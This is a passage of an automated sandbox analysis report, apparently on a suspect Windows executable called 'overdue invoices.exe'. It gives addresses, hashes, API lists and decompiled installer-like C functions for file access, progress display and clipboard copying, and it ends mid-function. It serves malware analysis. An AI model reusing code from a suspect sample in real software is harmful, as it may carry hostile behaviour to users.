                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004066bb
                  0x004066b8

                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                  • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                  • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                  • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 69%
                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423ed0; // 0x55e99c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}












                  0x0040138a
                  0x004013fa
                  0x00401392
                  0x0040139b
                  0x004013a0
                  0x00000000
                  0x00000000
                  0x004013a2
                  0x004013a3
                  0x004013ad
                  0x00000000
                  0x00401404
                  0x004013b0
                  0x004013b7
                  0x004013bd
                  0x004013be
                  0x004013c0
                  0x004013c2
                  0x004013b9
                  0x004013b9
                  0x004013ba
                  0x004013ba
                  0x004013c9
                  0x004013cb
                  0x004013f4
                  0x004013f4
                  0x004013c9
                  0x00000000

                  APIs
                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                  • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                  • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                  • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040575C Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                  0x00405760
                  0x0040576d
                  0x00405782
                  0x00405788

                  APIs
                  • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\overdue invoices.exe,80000000,00000003), ref: 00405760
                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: File$AttributesCreate
                  • String ID:
                  • API String ID: 415043291-0
                  • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                  • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                  • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                  • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040573D Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040573D(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                  0x00405741
                  0x0040574a
                  0x00000000
                  0x00405753
                  0x00405759

                  APIs
                  • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                  • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                  • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                  • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004031A8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                  0x004031ac
                  0x004031bf
                  0x004031c7
                  0x00000000
                  0x004031ce
                  0x00000000
                  0x004031d0

                  APIs
                  • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                  • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                  • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                  • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004031DA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                  0x004031e8
                  0x004031ee

                  APIs
                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: FilePointer
                  • String ID:
                  • API String ID: 973152223-0
                  • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                  • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                  • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                  • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 00404F61 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420498;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42366c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423ea8, 8);
							__eflags =  *0x423f2c - _t149; // 0x0
							if(__eflags == 0) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0; // 0x55dba8
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}



































                  0x00404f6a
                  0x00404f70
                  0x00404f79
                  0x00404f7c
                  0x0040510d
                  0x00405114
                  0x00405138
                  0x00405138
                  0x0040513e
                  0x0040514b
                  0x00405169
                  0x00405169
                  0x00405170
                  0x004051c7
                  0x004051c7
                  0x004051cb
                  0x00000000
                  0x00000000
                  0x004051cd
                  0x004051d0
                  0x00000000
                  0x00000000
                  0x004051da
                  0x004051e0
                  0x004051e2
                  0x004051e5
                  0x004052de
                  0x00000000
                  0x004052de
                  0x004051f4
                  0x00405200
                  0x00405206
                  0x00405209
                  0x0040520c
                  0x00405221
                  0x00405224
                  0x00405224
                  0x00405227
                  0x0040520e
                  0x00405213
                  0x00405219
                  0x0040521c
                  0x0040521c
                  0x00405237
                  0x0040523f
                  0x00405240
                  0x00405242
                  0x0040524b
                  0x0040524e
                  0x00405255
                  0x0040525c
                  0x00405264
                  0x00405264
                  0x00405272
                  0x00405278
                  0x0040527b
                  0x0040527b
                  0x00405282
                  0x00405288
                  0x00405291
                  0x00405298
                  0x004052a1
                  0x004052a3
                  0x004052a6
                  0x004052b5
                  0x004052b7
                  0x004052bd
                  0x004052be
                  0x004052bf
                  0x004052bf
                  0x004052c7
                  0x004052d2
                  0x004052d8
                  0x004052d8
                  0x00000000
                  0x00405242
                  0x00405172
                  0x00405178
                  0x004051a8
                  0x004051aa
                  0x004051b0
                  0x004051b2
                  0x004051bb
                  0x004051bb
                  0x004051c2
                  0x00000000
                  0x004051c2
                  0x0040517c
                  0x00405186
                  0x00000000
                  0x0040514d
                  0x0040514d
                  0x00405153
                  0x0040518b
                  0x00000000
                  0x00405194
                  0x0040515c
                  0x00405161
                  0x00405164
                  0x00000000
                  0x00405164
                  0x0040514b
                  0x00404f82
                  0x00404f86
                  0x00404f8f
                  0x00404f96
                  0x00404f99
                  0x00404f9c
                  0x00404f9f
                  0x00404fa0
                  0x00404fa1
                  0x00404fba
                  0x00404fbd
                  0x00404fc7
                  0x00404fd6
                  0x00404fde
                  0x00404fe6
                  0x00404feb
                  0x00404fee
                  0x00404ffa
                  0x00405003
                  0x0040500c
                  0x0040502f
                  0x00405035
                  0x00405046
                  0x0040504b
                  0x00405059
                  0x00405067
                  0x00405067
                  0x0040506c
                  0x0040507a
                  0x0040507a
                  0x0040507f
                  0x00405082
                  0x00405087
                  0x00405093
                  0x0040509c
                  0x004050a9
                  0x004050b8
                  0x004050ab
                  0x004050b0
                  0x004050b0
                  0x004050c4
                  0x004050c4
                  0x004050d8
                  0x004050e1
                  0x004050ea
                  0x004050fa
                  0x00405106
                  0x00405106
                  0x00000000

                  APIs
                  • GetDlgItem.USER32 ref: 00404FC0
                  • GetDlgItem.USER32 ref: 00404FCF
                  • GetClientRect.USER32 ref: 0040500C
                  • GetSystemMetrics.USER32 ref: 00405014
                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                  • ShowWindow.USER32(?,00000008), ref: 004050B0
                  • GetDlgItem.USER32 ref: 004050D1
                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
                  • GetDlgItem.USER32 ref: 00404FDE
                    • Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A
                  • GetDlgItem.USER32 ref: 00405123
                  • CreateThread.KERNEL32 ref: 00405131
                  • CloseHandle.KERNEL32(00000000), ref: 00405138
                  • ShowWindow.USER32(00000000), ref: 0040515C
                  • ShowWindow.USER32(00000000,00000008), ref: 00405161
                  • ShowWindow.USER32(00000008), ref: 004051A8
                  • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004051DA
                  • CreatePopupMenu.USER32 ref: 004051EB
                  • AppendMenuA.USER32 ref: 00405200
                  • GetWindowRect.USER32 ref: 00405213
                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
                  • OpenClipboard.USER32(00000000), ref: 00405282
                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                  • GlobalLock.KERNEL32 ref: 0040529B
                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                  • SetClipboardData.USER32 ref: 004052D2
                  • CloseClipboard.USER32 ref: 004052D8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                  • String ID: {
                  • API String ID: 590372296-366298937
                  • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                  • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                  • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                  • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404772 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8; // 0x55dd54
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423eb0; // 0x55dba8
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423eb9 & 0x00000002;
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
